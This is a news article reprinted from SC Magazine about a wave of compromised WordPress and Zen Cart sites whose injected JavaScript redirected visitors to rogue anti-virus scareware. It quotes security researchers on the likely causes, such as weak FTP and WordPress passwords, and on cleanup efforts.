Widespread attacks continue against WordPress sites

Powered by SC Magazine
 

Other sites now targeted as well.

A new campaign to hack WordPress websites and serve rogue anti-virus is underway, according to security researchers.

In addition to WordPress blogs, websites created with other PHP-based platforms, including the Zen Cart eCommerce solution, are affected by the attacks, Regina Smola, co-founder of WPSecurityLock, told SCMagazineUS.com.

Attackers injected malicious JavaScript into the sites, causing visitors to be redirected to scareware domains that attempted to trick users into installing a virus, she said.

Tens of thousands of legitimate sites are believed to be affected.

When visiting one of the compromised sites, users of Internet Explorer or Chrome were redirected to the rogue AV, Smola said. Firefox users were not affected.

Having an up-to-date anti-virus program would block the scareware program from running, she said.

David Dede, lead security researcher at malware detection solutions provider Sucuri Security, told SCMagazineUS.com that all PHP files on affected sites were modified. The malicious JavaScript loaded rogue anti-virus malware from two domains in this case: indesignstudioinfo.com/ls.php and zettapetta.com/js.php.

“The pain to the users is that every single file got infected,” Dede said. “On a normal WordPress site, it is around 1,000 files to clean.”

The affected sites were hosted by a number of US-based ISPs, including DreamHost, GoDaddy, Bluehost, Media temple and HostGator, the researchers said. Since all the hacked sites were utilising shared web hosting providers, analysts did not have access to system logs and were not able to conduct a full forensic investigation.

As a result, experts are unsure how the sites were compromised. Attackers may have used stolen FTP or WordPress passwords, launched a brute-force attack against the passwords, or leveraged a vulnerability in either WordPress itself or a WordPress plug-in, Dede wrote in a blog post.

Todd Redfoot, CISO of GoDaddy, said in a statement sent to WPSecurityLock that the attack was targeting websites running outdated versions of WordPress and other online applications. However, a number of sites running the latest version of Wordpress also had been compromised, Dede said.

It does not appear that attackers took advantage of an unknown vulnerability in WordPress because, if so, the exploits would be more widespread, he added.

Smola said a brute-force attack against passwords is possible.

“I have found that 99 percent of the sites that we have seen and fixed had very weak passwords to both their FTP and their hosting accounts,” she said.

Others have speculated that the attack may have leveraged a zero-day vulnerability in phpMyAdmin, an open-source tool that allows users to interact with their MySQL databases, Dede said. But there is no evidence of this.

WPSecurityLock has posted instructions for removing the infection, and Sucuri Security has released scripts to automate the process.

This is just the latest wave of attacks against WordPress websites that have been ongoing for the past month, Smola said.

In a previous attack, launched earlier this month, more than 40,000 WordPress sites were affected, she said.

And in April, reports surfaced that some WordPress sites had been compromised to direct users to malicious websites. In that case, the targeted sites appeared to be hosted by Network Solutions. WordPress creator Matt Mullenweg subsequently pinned the blame on improperly configured web servers, which he said are the responsibility of the hosting provider.

"WordPress, like all other web applications, must store database connection info in clear text," Mullenweg said. "Encrypting credentials doesn't matter because the keys have to be stored where the web server can read them in order to decrypt the data. If a malicious user has access to the file system — like they appeared to have in this case — it is trivial to obtain the keys and decrypt the information. When you leave the keys to the door in the lock, does it help to lock the door?"

Network Solutions representatives disagreed.

"This issue is not isolated to Network Solutions, nor is it a Network Solutions server issue," a spokeswoman told SCMagazineUS.com in an email. "We're working with the experts in the WordPress community and understand it is an issue with a WordPress plug-in or theme and it is impacting a number of websites that are hosted on various hosting platforms."

The latest spate of WordPress attacks may be linked to recently compromised websites belonging to the U.S. Department of Treasury that were attempting to exploit client-side vulnerabilities to serve malware, independent analyst Dancho Danchev said in a blog post.

"The hosting company used by the [Treasury Department's] Bureau of Engraving and Printing had an intrusion, and as a result of that intrusion, numerous websites were affected," he said a statement emailed to SCMagazineUS.com.

The Treasury Department did not name the hosting provider in the statement, but researchers said it was Network Solutions.

See original article on scmagazineus.com

Copyright © SC Magazine, US edition


 
 
 
Top Stories
Making a case for collaboration
[Blog post] Tap into your company’s people power.
 
Five zero-cost ways to improve MySQL performance
How to easily boost MySQL throughput by up to 5x.
 
Tracking the year of CIO churn
[Blog post] Who shone through in 12 months of disruption?
 
 
Sign up to receive iTnews email bulletins
   FOLLOW US...
Latest Comments
Polls
Which is the most prevalent cyber attack method your organisation faces?




   |   View results
Phishing and social engineering
  68%
 
Advanced persistent threats
  4%
 
Unpatched or unsupported software vulnerabilities
  11%
 
Denial of service attacks
  6%
 
Insider threats
  12%
TOTAL VOTES: 1052

Vote